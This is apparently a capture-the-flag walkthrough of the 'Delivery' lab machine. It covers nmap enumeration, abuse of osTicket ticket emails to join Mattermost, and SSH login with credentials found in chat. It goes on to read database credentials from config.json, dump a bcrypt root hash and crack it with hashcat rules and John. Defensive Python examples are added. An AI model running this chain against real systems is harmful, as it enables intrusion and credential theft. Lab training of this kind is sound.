
Enumeration
Nmap shows three active services: SSH on port 22, a web server on port 80, and an unknown service on port 8065.
ports=$(nmap -p- --min-rate=1000 -T4 10.129.235.124 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p$ports -sC -sV 10.129.235.124 -v -oN nmap_tcp
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open http Golang net/http server
|_http-title: Mattermost
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Sat, 06 Sep 2025 22:54:51 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: ng3wz85jm7byfdy83oiynb6nue
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Sun, 07 Sep 2025 00:09:04 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| GenericLines, Help, RTSPRequest, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Sat, 06 Sep 2025 22:54:51 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: c6rjcnqa6jbibeneghoi54ez6y
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Sun, 07 Sep 2025 00:08:38 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Sun, 07 Sep 2025 00:08:40 GMT
|_ Content-Length: 0
|_http-favicon: Unknown favicon MD5: 6B215BD4A98C6722601D4F8A985BF370
| http-methods:
|_ Supported Methods: GET
| http-robots.txt: 1 disallowed entry
|_/
Visiting http://10.129.235.124 reveals a Delivery landing page.


The frontend appears to be a static HTML page, but the HelpDesk link redirects to http://helpdesk.delivery.htb/. We need to add this hostname to the /etc/hosts file on our local machine.
10.129.235.124 delivery.htb helpdesk.delivery.htb
The “Contact Us” link directs unregistered users to the HelpDesk. By providing a valid company email, it becomes possible to access the MatterMost server at delivery.htb:8065. It appears that open registration on MatterMost is also enabled.

Browsing to the HelpDesk subdomain reveals that it is running the osTicket support ticketing system.

Foothold
HelpDesks typically let users send emails to a temporary address in order to update the status of an open ticket. However, if the corporate domain is used for tickets, this feature could give non-employees access to @company.com email addresses. Since many cloud services accept email domains as proof of employment, this might provide access to internal services. Let’s go ahead and create a new ticket.

Clicking the Create Ticket button redirects to a success page.

When a support ticket is created, a company email address in the @delivery.htb domain is issued. We can then use this email to register a new user account.


Next, we check the status of our support ticket to see if anything has been updated.

We have received an invitation. By visiting the confirmation URL, we can access the MatterMost instance and successfully join the Internal team.
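The sign-up above succeeded because an address in the company domain was treated as proof of employment. As an added example (not from the original walkthrough, osTicket or Mattermost), a registration gate can refuse help desk aliases and require a known mailbox; the numeric alias pattern, the directory set and the function name are assumptions.

```python
import re

TRUSTED_DOMAIN = "delivery.htb"
# Assumption: the help desk issues reply addresses whose local part is the
# numeric ticket id, e.g. 1234567@delivery.htb (constructed value).
TICKET_ALIAS = re.compile(r"^\d{4,}$")


def check_signup(email, employee_mailboxes, domain=TRUSTED_DOMAIN):
    """Return (allowed, reason) for a self-registration request."""
    local, sep, host = email.strip().lower().rpartition("@")
    if not sep or not local or "@" in local:
        return False, "malformed address"
    if host != domain:
        return False, "domain not trusted"
    # A mailbox created by the ticketing system proves only that someone
    # opened a ticket, not that they are staff.
    if TICKET_ALIAS.match(local):
        return False, "help desk ticket alias"
    # Domain match alone is not proof of employment: require a known mailbox.
    if local not in employee_mailboxes:
        return False, "mailbox not in employee directory"
    return True, "ok"


if __name__ == "__main__":
    staff = {"alice", "bob"}  # constructed directory
    for addr in ("Alice@Delivery.htb", "1234567@delivery.htb",
                 "mallory@delivery.htb", "alice@delivery.htb.example"):
        print(addr, check_signup(addr, staff))
```

Serving ticket replies from a dedicated subdomain that no other service trusts removes the overlap altogether.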


The Internal team appears to be discussing updates to the osTicket system’s theme. Within the conversation, some credentials are shared (maildeliverer:Youve_G0t_Mail!). They also mention developing a program to help prevent re-using the same passwords, with “PleaseSubscribe!” provided as a hint. Using the given credentials, we can log in via SSH as the maildeliverer user.
┌──(kali㉿kali)-[~/Delivery]
└─$ ssh maildeliverer@10.129.235.124
The authenticity of host '10.129.235.124 (10.129.235.124)' can't be established.
ED25519 key fingerprint is SHA256:AGdhHnQ749stJakbrtXVi48e6KTkaMj/+QNYMW+tyj8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.235.124' (ED25519) to the list of known hosts.
maildeliverer@10.129.235.124's password:
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt
8752<SNIP>15aa
Privilege Escalation
During filesystem enumeration, the MatterMost configuration file was located at /opt/mattermost/config/config.json. Reviewing this file reveals the SqlSettings section, which contains the database credentials.
cat /opt/mattermost/config/config.json
"SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Cra<SNIP>_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
},
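The exposure here is a database password stored in a file that an unprivileged shell user could read. As an added example (not from the original walkthrough or the Mattermost project), the audit below checks the file mode and parses the DataSource DSN for an embedded password; the function name and the sample values are assumptions.

```python
import json
import os
import re
import stat

# Go MySQL driver DSN as stored in SqlSettings.DataSource:
#   user:password@protocol(address)/dbname?params
DSN = re.compile(r"^(?P<user>[^:@/]+)(?::(?P<password>.*))?@\w+\((?P<addr>[^)]*)\)/")


def audit_mattermost_config(path):
    """Return a list of findings for a Mattermost-style config.json."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append("file is readable by every local user (mode %04o)" % mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("file is writable beyond its owner (mode %04o)" % mode)

    with open(path, encoding="utf-8") as fh:
        sql = json.load(fh).get("SqlSettings", {})

    match = DSN.match(sql.get("DataSource", ""))
    if match and match.group("password"):
        # Report the account and endpoint only; never echo the secret itself.
        findings.append("DataSource embeds a password for '%s' at %s"
                        % (match.group("user"), match.group("addr")))
    if sql.get("AtRestEncryptKey"):
        findings.append("AtRestEncryptKey is stored in the same file")
    return findings


if __name__ == "__main__":
    import tempfile
    # Constructed sample shaped like the SqlSettings block above; values are placeholders.
    sample = {"SqlSettings": {"DataSource": "mmuser:EXAMPLE_PW@tcp(127.0.0.1:3306)/mattermost",
                              "AtRestEncryptKey": "EXAMPLE_KEY"}}
    with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as fh:
        json.dump(sample, fh)
    os.chmod(fh.name, 0o644)
    print("\n".join(audit_mattermost_config(fh.name)))
    os.remove(fh.name)
```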
On checking the internal ports, we can see that the SQL port is open.
maildeliverer@Delivery:~$ ss -ntlp
<SNIP>
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
Using the discovered credentials, we can now log in to the mattermost MySQL database.
maildeliverer@Delivery:~$ mysql -u mmuser -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 74
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
Further enumeration of the database allows us to extract the root hash from the Users table.
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Audits |
<SNIP>
| Users |
+------------------------+
46 rows in set (0.000 sec)
MariaDB [mattermost]> select * from Users;
<SNIP>
root | $2a$10$VM6E<SNIP>gjjO | NULL | | root@delivery.htb
<SNIP>
From our earlier access to the Internal team, we recall the MatterMost root user warning about not reusing passwords, specifically mentioning the word “PleaseSubscribe!”. We can generate a wordlist based on “PleaseSubscribe!” with Hashcat and then use John the Ripper to crack the root hash.
┌──(kali㉿kali)-[~/Delivery]
└─$ echo PleaseSubscribe! | hashcat -r /usr/share/hashcat/rules/best64.rule --stdout
PleaseSubscribe!
!ebircsbuSesaelP
PLEASESUBSCRIBE!
pleaseSubscribe!
PleaseSubscribe!0
<SNIP>
This generates a small wordlist, which we save to a file named wordlist.txt. We then use John to crack the root hash with this wordlist.
┌──(kali㉿kali)-[~/Delivery]
└─$ john root_hash --wordlist=wordlist.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<SNIP> (?)
1g 0:00:00:00 DONE (2025-09-07 13:50) 2.857g/s 102.8p/s 102.8c/s 102.8C/s PleaseSubscribe!12..PleaseSubscrio
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The hash is successfully cracked, allowing us to use the root credentials to log in as the root user on the target machine.
maildeliverer@Delivery:~$ su root
Password:
root@Delivery:/home/maildeliverer# cd /root
root@Delivery:~# ls
mail.sh note.txt py-smtp.py root.txt
root@Delivery:~# cat root.txt
47d9<SNIP>2393
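The root password fell quickly because it was a rule-based mutation of a phrase already circulated in chat. As an added example (not from the original walkthrough or any tool named on this page), a password-change filter can reject candidates that reduce to a known phrase; the look-alike table, the thresholds and the function names are assumptions, and the sample inputs come from the output shown above or are constructed.

```python
import re

# Look-alike characters folded back to letters before comparison (constructed table).
LOOKALIKES = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                            "5": "s", "7": "t", "@": "a", "$": "s"})


def stem(password):
    """Lowercase, undo look-alike substitutions, keep letters only."""
    return re.sub(r"[^a-z]", "", password.lower().translate(LOOKALIKES))


def derived_from(candidate, known_words, min_len=6):
    """Return the known word that `candidate` is a simple mutation of, else None."""
    cand = stem(candidate)
    for word in known_words:
        base = stem(word)
        if len(base) < min_len:
            continue  # too short to match on without false positives
        # Case changes, affixes and character swaps all leave the stem inside;
        # the reversed comparison catches mirrored variants.
        if base in cand or base in cand[::-1]:
            return word
        # Truncations: the candidate is at least three quarters of the base's prefix.
        if len(cand) >= min_len and len(cand) * 4 >= len(base) * 3 and base.startswith(cand):
            return word
    return None


if __name__ == "__main__":
    known = ["PleaseSubscribe!"]  # phrase taken from the chat hint above
    for pw in ("PleaseSubscribe!12", "!ebircsbuSesaelP", "PLEASESUBSCRIBE!",
               "Pl3as3Subscr1be", "correct-horse-battery-staple"):
        print("%-30s -> %s" % (pw, derived_from(pw, known)))
```

The list of known words would hold a user's previous passwords at change time together with phrases an organization knows are in circulation.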